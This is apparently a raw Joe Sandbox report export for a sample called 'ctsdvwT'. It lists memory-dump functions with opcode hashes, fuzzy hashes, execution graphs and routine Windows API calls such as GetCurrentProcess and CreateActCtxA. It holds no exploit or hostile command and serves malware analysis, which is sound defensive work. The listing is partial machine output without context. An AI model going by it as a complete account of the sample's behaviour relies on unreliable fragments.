                                            • Snapshot File: hcaresult_8_2_2f60000_ctsdvwT.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 5e1039c26b5042b5b77113eaa5494c7ffd39589ffc03826bdc37745b6535d807
                                            • Instruction ID: bb0406fc553b10f66051f0afaab5f05a19e2f5a84d4de22672b3ee7dc12c401d
                                            • Opcode Fuzzy Hash: 5e1039c26b5042b5b77113eaa5494c7ffd39589ffc03826bdc37745b6535d807
                                            • Instruction Fuzzy Hash: CB312734B002158FEB24EB34CA186AE77B2EF89385F5005A8D505BB3A0DB36DD46CB91
                                            Function 02F68D49 Relevance: .1, Instructions: 82COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000008.00000002.1894674252.0000000002F60000.00000040.00000800.00020000.00000000.sdmp, Offset: 02F60000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_8_2_2f60000_ctsdvwT.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 369b88bc9b5c4d3ad85d884cea402e63e3389ebba162a183ff5a9a5ed3635d36
                                            • Instruction ID: dda9e26e6dfd92b34dac06d733d0e17a33ddfc56afb387216d3b62c9464e3f2d
                                            • Opcode Fuzzy Hash: 369b88bc9b5c4d3ad85d884cea402e63e3389ebba162a183ff5a9a5ed3635d36
                                            • Instruction Fuzzy Hash: 1631C571E0020A9BDB15CFA5D84479EF7B2FF99384F108619E506EB340DB70D84ACB91
                                            Function 02F68D58 Relevance: .1, Instructions: 78COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000008.00000002.1894674252.0000000002F60000.00000040.00000800.00020000.00000000.sdmp, Offset: 02F60000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_8_2_2f60000_ctsdvwT.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: a3945ea9cadb81d32fd74a2139de4d141f0d7d1b1a8421b1540d40ff1c70a7a8
                                            • Instruction ID: 7e2ee1da0e2c6a0eb52c40e3b1ce97dc4dd32a267075ce2abb50a268cac59aff
                                            • Opcode Fuzzy Hash: a3945ea9cadb81d32fd74a2139de4d141f0d7d1b1a8421b1540d40ff1c70a7a8
                                            • Instruction Fuzzy Hash: 99217330E0020A9BDB15CFA5D8546AEF7B2FF89384F108619E906EB240DB71D84ACB91
                                            Function 02F616B0 Relevance: .1, Instructions: 77COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000008.00000002.1894674252.0000000002F60000.00000040.00000800.00020000.00000000.sdmp, Offset: 02F60000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_8_2_2f60000_ctsdvwT.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 99c2927743b79de427592a99baef90b753ff9af925a1f1cc327be9f9951ae27a
                                            • Instruction ID: 914cb10811f50b00118d5ba816fbcf3e6a49d18990aef325bfb5ba9dc069e26f
                                            • Opcode Fuzzy Hash: 99c2927743b79de427592a99baef90b753ff9af925a1f1cc327be9f9951ae27a
                                            • Instruction Fuzzy Hash: A621D434A001494FDB21DB39E88876A7776EB41348F104A25E91EC7365EB38DC86CB92
                                            Function 02F61380 Relevance: .1, Instructions: 74COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000008.00000002.1894674252.0000000002F60000.00000040.00000800.00020000.00000000.sdmp, Offset: 02F60000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_8_2_2f60000_ctsdvwT.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: d823487caa5ec9e7d9b1a469b0879def9946848320276b4b849396a3beb10fdf
                                            • Instruction ID: 0a0e62676b89ad134408d7b5aa9c2cb0b21e97cd4d685b971b54601e39ede418
                                            • Opcode Fuzzy Hash: d823487caa5ec9e7d9b1a469b0879def9946848320276b4b849396a3beb10fdf
                                            • Instruction Fuzzy Hash: 95218E70E002088FEF311A69D59E37A7A65E742399F54092AFA0EC7780DF29C881C782
                                            Function 02F68C48 Relevance: .1, Instructions: 74COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000008.00000002.1894674252.0000000002F60000.00000040.00000800.00020000.00000000.sdmp, Offset: 02F60000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_8_2_2f60000_ctsdvwT.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: f4740aa2d99826e264c9991bebb5ed5e549b9add551f622af54e6fba7d4fa55d
                                            • Instruction ID: ca9e1a48facac44430f0e3e9434f9a82da0c4cc7afd6117daed250188b8dd47b
                                            • Opcode Fuzzy Hash: f4740aa2d99826e264c9991bebb5ed5e549b9add551f622af54e6fba7d4fa55d
                                            • Instruction Fuzzy Hash: B9218131E0160A9BDB19CFA4C4546AEF7B2EF89380F24851DE916F7340DB709849CB51
                                            Function 02F1D01C Relevance: .1, Instructions: 72COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000008.00000002.1894449522.0000000002F1D000.00000040.00000800.00020000.00000000.sdmp, Offset: 02F1D000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_8_2_2f1d000_ctsdvwT.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 82280120bf5c0f633129e351f4ebbdbe5fb244d64519dfbbd057067f1b1ed36f
                                            • Instruction ID: 00b1d06e76fc26f298d279ee0a908ff500becb2c8c75a282f339a29985c9ee00
                                            • Opcode Fuzzy Hash: 82280120bf5c0f633129e351f4ebbdbe5fb244d64519dfbbd057067f1b1ed36f
                                            • Instruction Fuzzy Hash: FE21F276A04200DFDB14DF14D984B26BBB5EB84B54F60C56DDA0A4B25AC33AD447CA61
                                            Function 02F64F9A Relevance: .1, Instructions: 71COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000008.00000002.1894674252.0000000002F60000.00000040.00000800.00020000.00000000.sdmp, Offset: 02F60000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_8_2_2f60000_ctsdvwT.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: b9a1af6c36136033d0f3048e0ab328c0914667e3ceed1168e688eb776df03d34
                                            • Instruction ID: 29a5f9fdde4e34d6964cf09d9007953eae223a491c9c15b0e3825b383e8610ed
                                            • Opcode Fuzzy Hash: b9a1af6c36136033d0f3048e0ab328c0914667e3ceed1168e688eb776df03d34
                                            • Instruction Fuzzy Hash: AA210A35B00209CFDB24DB78D558AADBBF1EB4DB44B1044A8E506EB360DB36DD05DB91
                                            Function 02F61898 Relevance: .1, Instructions: 70COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000008.00000002.1894674252.0000000002F60000.00000040.00000800.00020000.00000000.sdmp, Offset: 02F60000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_8_2_2f60000_ctsdvwT.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 6e8db6e37fa5d8270744438f0e7cc82d8dd23201a6aa7425796a5430346cd1ea
                                            • Instruction ID: 35d5be055108ff18d944d867a772f2f5336fb4a7df978305013ab85f85e8a6f2
                                            • Opcode Fuzzy Hash: 6e8db6e37fa5d8270744438f0e7cc82d8dd23201a6aa7425796a5430346cd1ea
                                            • Instruction Fuzzy Hash: B6211B30B002058FDB64DB74CA287AE77F6EB89385F100468C109EB360DB35DD45DBA1
                                            Function 02F68C58 Relevance: .1, Instructions: 70COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000008.00000002.1894674252.0000000002F60000.00000040.00000800.00020000.00000000.sdmp, Offset: 02F60000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_8_2_2f60000_ctsdvwT.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 0447e4d3910521b0de183b53fe16cf08348343e2b421ddbbf28b6fe3090e02fb
                                            • Instruction ID: 6da62c262acb91e7c470d5caa02c84ecface74d515b114daccb97bd3a74e83d6
                                            • Opcode Fuzzy Hash: 0447e4d3910521b0de183b53fe16cf08348343e2b421ddbbf28b6fe3090e02fb
                                            • Instruction Fuzzy Hash: 74215031E0161A9BDB19CFA4C4546EEF7B2FF89380F24851AE916F7340DB709849CB91
                                            Function 02F616C0 Relevance: .1, Instructions: 69COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000008.00000002.1894674252.0000000002F60000.00000040.00000800.00020000.00000000.sdmp, Offset: 02F60000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_8_2_2f60000_ctsdvwT.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: b5e4e0113032e36c8977ecf7539219eedee32acb14a02ff397b8a4faea98e864
                                            • Instruction ID: 358dfd16f89539b40857a70fba442bdd53083abcb4664f31c6dbd08a17bf9f1f
                                            • Opcode Fuzzy Hash: b5e4e0113032e36c8977ecf7539219eedee32acb14a02ff397b8a4faea98e864
                                            • Instruction Fuzzy Hash: 5F21AF34A101094FDF20DB39E88876A77B6EB45348F104A21E91ECB365EB38DC85DB92
                                            Function 02F61888 Relevance: .1, Instructions: 69COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000008.00000002.1894674252.0000000002F60000.00000040.00000800.00020000.00000000.sdmp, Offset: 02F60000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_8_2_2f60000_ctsdvwT.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 8d4382f078447d87ae890972c5cc3b8d8cffba619b66fdd13e35bd9a4765baa0
                                            • Instruction ID: 1557127451a5b0ec08957122b89b7a47491f1cff554e31f2536edfa6b0b4043d
                                            • Opcode Fuzzy Hash: 8d4382f078447d87ae890972c5cc3b8d8cffba619b66fdd13e35bd9a4765baa0
                                            • Instruction Fuzzy Hash: 38212A30B002058FEB64DB78CA687AE77B2EB49385F100468D209EB360DB76DD45DBA1
                                            Function 02F64FA8 Relevance: .1, Instructions: 68COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000008.00000002.1894674252.0000000002F60000.00000040.00000800.00020000.00000000.sdmp, Offset: 02F60000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_8_2_2f60000_ctsdvwT.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 3815a0c3b71f24c96a9f611938c414bba81f5ee3f627e0d3c98d59317c5ec87c
                                            • Instruction ID: 456fcedbced5cbb82926c221bfb831bc94ce07fa53a166cb5f459a96a5274a4d
                                            • Opcode Fuzzy Hash: 3815a0c3b71f24c96a9f611938c414bba81f5ee3f627e0d3c98d59317c5ec87c
                                            • Instruction Fuzzy Hash: AC21E935B00209CFDB64EB78D558AADBBF1EB49B44B1004A8E506EB360DB36DD05CB91
                                            Function 02F60828 Relevance: .1, Instructions: 66COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000008.00000002.1894674252.0000000002F60000.00000040.00000800.00020000.00000000.sdmp, Offset: 02F60000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_8_2_2f60000_ctsdvwT.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 5bac7bf7fb84950a37523fa5deb00402fdc0838103ef927e29a4039f52ea2004
                                            • Instruction ID: 17fe443c95a62cb991bc4a4cb90c83c71e09826589f2d59567fca04d0f59eae3
                                            • Opcode Fuzzy Hash: 5bac7bf7fb84950a37523fa5deb00402fdc0838103ef927e29a4039f52ea2004
                                            • Instruction Fuzzy Hash: C411B231E002144FEF219A79D458BBD7761FB42294F35497ED142CB241DF65CC858BD1
                                            Function 02F1D005 Relevance: .1, Instructions: 62COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000008.00000002.1894449522.0000000002F1D000.00000040.00000800.00020000.00000000.sdmp, Offset: 02F1D000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_8_2_2f1d000_ctsdvwT.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 0dc2c6c7a55e307ccbe7e00a64cdb07003ce31cdb3d59cbf3a3123ecc4938fee
                                            • Instruction ID: bdbc64eb4997cf221bba9b0e9283f29913fd38105bc0f53ce57479f979d77204
                                            • Opcode Fuzzy Hash: 0dc2c6c7a55e307ccbe7e00a64cdb07003ce31cdb3d59cbf3a3123ecc4938fee
                                            • Instruction Fuzzy Hash: 5D21A1755093C08FCB02CF24D994716BF71EF46214F28C5EAD9498F2A7C33A980ACB62
                                            Function 02F60848 Relevance: .1, Instructions: 62COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000008.00000002.1894674252.0000000002F60000.00000040.00000800.00020000.00000000.sdmp, Offset: 02F60000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_8_2_2f60000_ctsdvwT.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 5fbee9a9bc4441fd37f2291fbeab113356a6b9c98bdbe03bdde8d83e664e9fa3
                                            • Instruction ID: 7a7ab8ec87b23dca66d00ea70aafcc40bcce490c906d5ad69a2c836439ff0b72
                                            • Opcode Fuzzy Hash: 5fbee9a9bc4441fd37f2291fbeab113356a6b9c98bdbe03bdde8d83e664e9fa3
                                            • Instruction Fuzzy Hash: 50116A30F102088FDF649A79D458B3E72A6FB852A4F20897DE206CB351DF65CC859BD1
                                            Function 02F617D0 Relevance: .1, Instructions: 60COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000008.00000002.1894674252.0000000002F60000.00000040.00000800.00020000.00000000.sdmp, Offset: 02F60000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_8_2_2f60000_ctsdvwT.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 0671f06bc3f89ad7cb68b6e4f028c35bb89c056091ccf5ae0725b02e27af3ad0
                                            • Instruction ID: d34737c296bba218f3097ed952af303f604667f97b554732722cfc9b9d705c3a
                                            • Opcode Fuzzy Hash: 0671f06bc3f89ad7cb68b6e4f028c35bb89c056091ccf5ae0725b02e27af3ad0
                                            • Instruction Fuzzy Hash: 1111C276F002455FCB119F75980DA2F7FF5EB48690B140465EA49D3340EB34C842CB92
                                            Function 02F6149A Relevance: .1, Instructions: 55COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000008.00000002.1894674252.0000000002F60000.00000040.00000800.00020000.00000000.sdmp, Offset: 02F60000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_8_2_2f60000_ctsdvwT.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 9b4348566fcad3e90b41c4648cc18c1214d40291e7927370024c3183228cd1f1
                                            • Instruction ID: c8927eb066eaebb811a1ecfbda12492b3997a811788d781dc607c83a7a3997c7
                                            • Opcode Fuzzy Hash: 9b4348566fcad3e90b41c4648cc18c1214d40291e7927370024c3183228cd1f1
                                            • Instruction Fuzzy Hash: D5113031E002159FCF61EFB889582BEBBF5EF49250B24447AD509E7742EB75C8428B91
                                            Function 02F614A8 Relevance: .1, Instructions: 53COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000008.00000002.1894674252.0000000002F60000.00000040.00000800.00020000.00000000.sdmp, Offset: 02F60000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_8_2_2f60000_ctsdvwT.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: d9ce69cc3c6e64a676524c05c5be2eb6d1914ca89566669b8c88c74a2c59ab5f
                                            • Instruction ID: a80197806f2c9f8ab174a7f198e779acd16f0e266105e0dc5a4ae7e3a60655e4
                                            • Opcode Fuzzy Hash: d9ce69cc3c6e64a676524c05c5be2eb6d1914ca89566669b8c88c74a2c59ab5f
                                            • Instruction Fuzzy Hash: DB014431E003158FCF61EFB889582BEB7F5EF49291B24047AD909E7341EB75D9428BA1
                                            Function 02F61534 Relevance: .0, Instructions: 36COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000008.00000002.1894674252.0000000002F60000.00000040.00000800.00020000.00000000.sdmp, Offset: 02F60000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_8_2_2f60000_ctsdvwT.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: bcdf0790375c878daeb9f0f6169ed6dc01f708429be875af17b4f968ea58c5bd
                                            • Instruction ID: a353d1f30eaf53dea7f0badfba94e55cac2a23cfdcdd6954bfc1dc43f40824db
                                            • Opcode Fuzzy Hash: bcdf0790375c878daeb9f0f6169ed6dc01f708429be875af17b4f968ea58c5bd
                                            • Instruction Fuzzy Hash: 32F02B73E04250CFD7228BB498941BDFBB1EE5529175800D7D60ADB752D761D842CB51
                                            Function 02F67BEA Relevance: .0, Instructions: 35COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000008.00000002.1894674252.0000000002F60000.00000040.00000800.00020000.00000000.sdmp, Offset: 02F60000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_8_2_2f60000_ctsdvwT.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 0275dfdbae2ed136e1739f5cdbfd2be4f41b8d2b41f90f4c5fca7db74da353f0
                                            • Instruction ID: c94b830ec59f713a47b941ab48106fae62f524c3af4174258afa3d97f7e4e308
                                            • Opcode Fuzzy Hash: 0275dfdbae2ed136e1739f5cdbfd2be4f41b8d2b41f90f4c5fca7db74da353f0
                                            • Instruction Fuzzy Hash: CC01627094010EAFCB41EBB9F940A8DBBB1FB44304F108279C4059B295DB359E859B95
                                            Function 02F67BF8 Relevance: .0, Instructions: 33COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000008.00000002.1894674252.0000000002F60000.00000040.00000800.00020000.00000000.sdmp, Offset: 02F60000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_8_2_2f60000_ctsdvwT.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 5d6af0ecb585b1d237b229a6baf6251990ee098715dd1dbb3492fd4c6636419b
                                            • Instruction ID: 407efcecbe1f57dee27fa350db7e7e9ff2e78ad51c8547143c6058b0ed42a352
                                            • Opcode Fuzzy Hash: 5d6af0ecb585b1d237b229a6baf6251990ee098715dd1dbb3492fd4c6636419b
                                            • Instruction Fuzzy Hash: 58F0313094020DAFCB41EBA9F940A9DB7B5EB44304F108279C4059B2A4DB31AE899B95
                                            Function 02F66C14 Relevance: .0, Instructions: 12COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000008.00000002.1894674252.0000000002F60000.00000040.00000800.00020000.00000000.sdmp, Offset: 02F60000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_8_2_2f60000_ctsdvwT.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 600e5aa2a9e667826730cf1907dfe4cc76ca8c52e1d4ce9549b1df760e50ac95
                                            • Instruction ID: 7ac018ea0472779828d38047c18dd85b3551be7e8085a563de234104ff49be41
                                            • Opcode Fuzzy Hash: 600e5aa2a9e667826730cf1907dfe4cc76ca8c52e1d4ce9549b1df760e50ac95
                                            • Instruction Fuzzy Hash: D3C012363040504F85019728E05447937B5DBC9169314019AD145CB322CE1558028F40

                                            Execution Graph

                                            Execution Coverage:7.6%
                                            Dynamic/Decrypted Code Coverage:100%
                                            Signature Coverage:0%
                                            Total number of Nodes:48
                                            Total number of Limit Nodes:8
                                            execution_graph 20669 7091b98 20671 7091bbe 20669->20671 20674 7091d58 20669->20674 20670 7091d23 20670->20670 20671->20670 20675 7091e18 PostMessageW 20671->20675 20677 7091e12 PostMessageW 20671->20677 20676 7091e84 20675->20676 20676->20671 20678 7091e84 20677->20678 20678->20671 20679 fcd588 DuplicateHandle 20680 fcd61e 20679->20680 20681 fc4668 20682 fc467a 20681->20682 20683 fc4686 20682->20683 20685 fc4779 20682->20685 20686 fc479d 20685->20686 20690 fc4888 20686->20690 20694 fc4879 20686->20694 20692 fc48af 20690->20692 20691 fc498c 20691->20691 20692->20691 20698 fc44b4 20692->20698 20695 fc48af 20694->20695 20696 fc498c 20695->20696 20697 fc44b4 CreateActCtxA 20695->20697 20696->20696 20697->20696 20699 fc5918 CreateActCtxA 20698->20699 20701 fc59db 20699->20701 20653 7094100 CloseHandle 20654 7094167 20653->20654 20655 fcafb0 20659 fcb0a8 20655->20659 20664 fcb097 20655->20664 20656 fcafbf 20660 fcb0dc 20659->20660 20661 fcb0b9 20659->20661 20660->20656 20661->20660 20662 fcb2e0 GetModuleHandleW 20661->20662 20663 fcb30d 20662->20663 20663->20656 20665 fcb0dc 20664->20665 20666 fcb0b9 20664->20666 20665->20656 20666->20665 20667 fcb2e0 GetModuleHandleW 20666->20667 20668 fcb30d 20667->20668 20668->20656 20702 fcd340 20703 fcd386 GetCurrentProcess 20702->20703 20705 fcd3d8 GetCurrentThread 20703->20705 20706 fcd3d1 20703->20706 20707 fcd415 GetCurrentProcess 20705->20707 20709 fcd40e 20705->20709 20706->20705 20708 fcd44b 20707->20708 20710 fcd473 GetCurrentThreadId 20708->20710 20709->20707 20711 fcd4a4 20710->20711

                                            Executed Functions

                                            Function 00FCD331 Relevance: 6.1, APIs: 4, Instructions: 129threadCOMMON
                                            Download Yara Rule

                                            Control-flow Graph

                                            • Executed
                                            • Not Executed
                                            control_flow_graph 513 fcd331-fcd3cf GetCurrentProcess 517 fcd3d8-fcd40c GetCurrentThread 513->517 518 fcd3d1-fcd3d7 513->518 519 fcd40e-fcd414 517->519 520 fcd415-fcd449 GetCurrentProcess 517->520 518->517 519->520 522 fcd44b-fcd451 520->522 523 fcd452-fcd46d call fcd50f 520->523 522->523 526 fcd473-fcd4a2 GetCurrentThreadId 523->526 527 fcd4ab-fcd50d 526->527 528 fcd4a4-fcd4aa 526->528 528->527
                                            APIs
                                            • GetCurrentProcess.KERNEL32 ref: 00FCD3BE
                                            • GetCurrentThread.KERNEL32 ref: 00FCD3FB
                                            • GetCurrentProcess.KERNEL32 ref: 00FCD438
                                            • GetCurrentThreadId.KERNEL32 ref: 00FCD491
                                            Memory Dump Source
                                            • Source File: 0000000A.00000002.1912551911.0000000000FC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00FC0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_10_2_fc0000_ctsdvwT.jbxd
                                            Similarity
                                            • API ID: Current$ProcessThread
                                            • String ID:
                                            • API String ID: 2063062207-0
                                            • Opcode ID: a8e5db1faac50e9f293136ee6eb43e9e8104ff1967c9732009b43180182855cc
                                            • Instruction ID: 2c58fa1efd3881336e9131b8a6ebb7d7baed7a8c69b05ffe31c22f36afe46508
                                            • Opcode Fuzzy Hash: a8e5db1faac50e9f293136ee6eb43e9e8104ff1967c9732009b43180182855cc
                                            • Instruction Fuzzy Hash: 625165B0D01349CFDB18DFA9D648B9EBBF1AF48314F20C569D519A72A1DB34A884CF25
                                            Function 00FCD340 Relevance: 6.1, APIs: 4, Instructions: 128threadCOMMON
                                            Download Yara Rule

                                            Control-flow Graph

                                            • Executed
                                            • Not Executed
                                            control_flow_graph 535 fcd340-fcd3cf GetCurrentProcess 539 fcd3d8-fcd40c GetCurrentThread 535->539 540 fcd3d1-fcd3d7 535->540 541 fcd40e-fcd414 539->541 542 fcd415-fcd449 GetCurrentProcess 539->542 540->539 541->542 544 fcd44b-fcd451 542->544 545 fcd452-fcd46d call fcd50f 542->545 544->545 548 fcd473-fcd4a2 GetCurrentThreadId 545->548 549 fcd4ab-fcd50d 548->549 550 fcd4a4-fcd4aa 548->550 550->549
                                            APIs
                                            • GetCurrentProcess.KERNEL32 ref: 00FCD3BE
                                            • GetCurrentThread.KERNEL32 ref: 00FCD3FB
                                            • GetCurrentProcess.KERNEL32 ref: 00FCD438
                                            • GetCurrentThreadId.KERNEL32 ref: 00FCD491
                                            Memory Dump Source
                                            • Source File: 0000000A.00000002.1912551911.0000000000FC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00FC0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_10_2_fc0000_ctsdvwT.jbxd
                                            Similarity
                                            • API ID: Current$ProcessThread
                                            • String ID:
                                            • API String ID: 2063062207-0
                                            • Opcode ID: 5775f36c75900b7d686f1dbdad95518c5e54dabfbbec85a52a8f69845d6a3d52
                                            • Instruction ID: 3c53837b825a35828c81110308ccb054f64d55505d9c355d5721f098c59bcaa5
                                            • Opcode Fuzzy Hash: 5775f36c75900b7d686f1dbdad95518c5e54dabfbbec85a52a8f69845d6a3d52
                                            • Instruction Fuzzy Hash: FD5178B0D00249CFCB18DFAAD648B9EBBF1AF48314F20C569D519A7360DB34A844CF65
                                            Function 00FCB0A8 Relevance: 1.7, APIs: 1, Instructions: 195COMMON
                                            Download Yara Rule

                                            Control-flow Graph

                                            • Executed
                                            • Not Executed
                                            control_flow_graph 580 fcb0a8-fcb0b7 581 fcb0b9-fcb0c6 call fc9b14 580->581 582 fcb0e3-fcb0e7 580->582 587 fcb0dc 581->587 588 fcb0c8 581->588 583 fcb0e9-fcb0f3 582->583 584 fcb0fb-fcb13c 582->584 583->584 591 fcb13e-fcb146 584->591 592 fcb149-fcb157 584->592 587->582 635 fcb0ce call fcb340 588->635 636 fcb0ce call fcb331 588->636 591->592 594 fcb159-fcb15e 592->594 595 fcb17b-fcb17d 592->595 593 fcb0d4-fcb0d6 593->587 596 fcb218-fcb2d8 593->596 598 fcb169 594->598 599 fcb160-fcb167 call fcad10 594->599 597 fcb180-fcb187 595->597 630 fcb2da-fcb2dd 596->630 631 fcb2e0-fcb30b GetModuleHandleW 596->631 602 fcb189-fcb191 597->602 603 fcb194-fcb19b 597->603 601 fcb16b-fcb179 598->601 599->601 601->597 602->603 605 fcb19d-fcb1a5 603->605 606 fcb1a8-fcb1b1 call fcad20 603->606 605->606 611 fcb1be-fcb1c3 606->611 612 fcb1b3-fcb1bb 606->612 613 fcb1c5-fcb1cc 611->613 614 fcb1e1-fcb1ee 611->614 612->611 613->614 616 fcb1ce-fcb1de call fcad30 call fcad40 613->616 621 fcb1f0-fcb20e 614->621 622 fcb211-fcb217 614->622 616->614 621->622 630->631 632 fcb30d-fcb313 631->632 633 fcb314-fcb328 631->633 632->633 635->593 636->593
                                            APIs
                                            • GetModuleHandleW.KERNELBASE(00000000), ref: 00FCB2FE
                                            Memory Dump Source
                                            • Source File: 0000000A.00000002.1912551911.0000000000FC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00FC0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_10_2_fc0000_ctsdvwT.jbxd
                                            Similarity
                                            • API ID: HandleModule
                                            • String ID:
                                            • API String ID: 4139908857-0
                                            • Opcode ID: aee581c80414f25feb11389e5ede40a39eba1d0e9095f8701f95b2255d1e9d62
                                            • Instruction ID: 2c87ea16340d483abc2c5e151d81e9e5d100fcd2a9607ee02fb909e125c7ed45
                                            • Opcode Fuzzy Hash: aee581c80414f25feb11389e5ede40a39eba1d0e9095f8701f95b2255d1e9d62
                                            • Instruction Fuzzy Hash: D9714474A00B068FD724DF29D656B9ABBF1FF88314F008A2DD48AD7A50D735E945CB90
                                            Function 00FC590C Relevance: 1.6, APIs: 1, Instructions: 97COMMON
                                            Download Yara Rule

                                            Control-flow Graph

                                            • Executed
                                            • Not Executed
                                            control_flow_graph 637 fc590c-fc59d9 CreateActCtxA 639 fc59db-fc59e1 637->639 640 fc59e2-fc5a3c 637->640 639->640 647 fc5a3e-fc5a41 640->647 648 fc5a4b-fc5a4f 640->648 647->648 649 fc5a60 648->649 650 fc5a51-fc5a5d 648->650 651 fc5a61 649->651 650->649 651->651
                                            APIs
                                            • CreateActCtxA.KERNEL32(?), ref: 00FC59C9
                                            Memory Dump Source
                                            • Source File: 0000000A.00000002.1912551911.0000000000FC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00FC0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_10_2_fc0000_ctsdvwT.jbxd
                                            Similarity
                                            • API ID: Create
                                            • String ID:
                                            • API String ID: 2289755597-0
                                            • Opcode ID: c1bf172eea89b8e641837bbbdac1184ed9e54f5007669f21b9c7c6f0f1c33e9c
                                            • Instruction ID: 36e313bf47be67f960a33570b8b3599c39749e2bd7d2de81733ca79536ceaa81
